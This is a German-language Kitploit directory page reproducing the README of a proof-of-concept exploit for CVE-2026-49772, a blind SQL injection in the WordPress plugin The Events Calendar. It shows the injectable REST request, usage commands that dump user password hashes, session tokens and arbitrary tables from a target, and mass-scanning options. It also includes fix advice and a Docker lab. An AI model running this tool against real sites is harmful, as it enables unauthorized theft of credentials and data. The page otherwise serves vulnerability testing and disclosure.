Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-49772 — Blind-SQL-Injection-Exploit für CVE-2026-49772, der das WordPress-Plugin The Events Calendar angreift. Extrahiert Datenbankinhalte über boolesche/zeitbasierte Orakel mit Multithread-Scanning, Benutzer-Hash-Dumping und benutzerdefinierter Abfrageunterstützung. | Kitploit
Tools/GitHubGitHub/joshuavanderpoll/cve-2026-49772
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubjoshuavanderpoll/cve-2026-49772

CVE-2026-49772

Blind-SQL-Injection-Exploit für CVE-2026-49772, der das WordPress-Plugin The Events Calendar angreift. Extrahiert Datenbankinhalte über boolesche/zeitbasierte Orakel mit Multithread-Scanning, Benutzer-Hash-Dumping und benutzerdefinierter Abfrageunterstützung.

Repository anzeigen
3vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

The Events Calendar SQL Injection (CVE-2026-49772) PoC

Python

Beschreibung

CVE-2026-49772 ist eine nicht authentifizierte blinde SQL-Injection im WordPress-Plugin The Events Calendar. Ein defekter REST-Parameter-Validator (validate_callback gibt eine Closure statt einer Validierung zurück) ermöglicht es dem order-Parameter in der experimentellen tec/v1 REST-API, die SQL ORDER BY-Klausel unsaniert zu erreichen:

root@kitploit:~
GET /wp-json/tec/v1/events?orderby=event_date&order=<INJECTION>
root@kitploit:~
... ORDER BY event_date <INJECTION>, wp_posts.post_date DESC ...

Dies ist eine schreibgeschützte Injection (keine gestapelten Abfragen, keine Schreibvorgänge, keine direkte Ausgabe) – aber die gesamte Datenbank ist über ein boolesches/zeitbasiertes Oracle extrahierbar: Benutzer-Passwort-Hashes, Sitzungstoken, Anwendungspasswörter, geheime Schlüssel.

Betroffene Versionen: The Events Calendar 6.15.12 – 6.16.2 (behoben in 6.16.3) Schweregrad: CVSS 3.1 9.3 Kritisch — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Funktionen

  • --check — Nicht-eingreifende Erkennung: REST-Namespace, Plugin-Version, zeitbasierte Bestätigung
  • --recon — DB-Fingerabdruck: Version, aktueller Benutzer, Datenbank, Betriebssystem, Berechtigungen, Tabellenpräfix
  • --users — wp_users auslesen: Anmeldenamen, E-Mails, Passwort-Hashes
  • --user-meta — wp_usermeta auslesen: Sitzungstoken, Anwendungspasswörter, Capabilities
  • --get-table — Beliebiges Table auslesen mit automatischer Spaltenermittlung
  • --query — Ergebnis einer beliebigen skalaren SELECT-Abfrage extrahieren
  • Zwei Oracle — schnelles boolesches (Standard) oder zeitbasiert, multithreaded; keine externen Abhängigkeiten

Installation

Reine Python 3 Standardbibliothek — requirements.txt ist für den Standard-Workflow enthalten, installiert aber nichts zusätzliches.

OSX / Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help

Verwendung

root@kitploit:~
python3 CVE-2026-49772.py <target> <action> [options]

Wählen Sie genau eine Aktion: --check, --recon, --users, --user-meta, --get-table <TABLE>, --query <SQL>. Führen Sie --help für alle Optionen aus.


Schwachstellenüberprüfung

root@kitploit:~
python3 CVE-2026-49772.py target.tld --check

Datenbank-Erkundung

root@kitploit:~
python3 CVE-2026-49772.py target.tld --recon

Benutzer + Passwort-Hashes auslesen

root@kitploit:~
python3 CVE-2026-49772.py target.tld --users

Benutzerdefinierten Wert extrahieren

root@kitploit:~
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"

Optimierung: --technique boolean|time, --delay, --threads, --rows, --prefix, --where, -useragent, -timeout. Scannen Sie viele Hosts mit -l targets.txt.

Docker PoC

Ein eigenständiges Docker Compose-Labor mit dem verwundbaren Plugin (gebündelt, nicht beim Start heruntergeladen) und vorbefüllten Events. Siehe docker/DOCKER.md.

root@kitploit:~
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check

Behebung

  • Aktualisieren Sie The Events Calendar auf 6.16.3 oder neuer
  • Blockieren Sie bis zur Behebung /wp-json/tec/v1/ in der WAF / dem Reverse Proxy

Referenzen

  • The Events Calendar
  • CVE.org — CVE-2026-49772
  • NVD — CVE-2026-49772
  • GitHub Advisory — GHSA-v796-wqfq-j4xh
  • Patchstack — The Events Calendar SQL Injection

Haftungsausschluss

Dieses Tool wird nur zu Bildungs- und Forschungszwecken bereitgestellt. Verwenden Sie es nur gegen Systeme, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Der Ersteller übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Tool herunterladen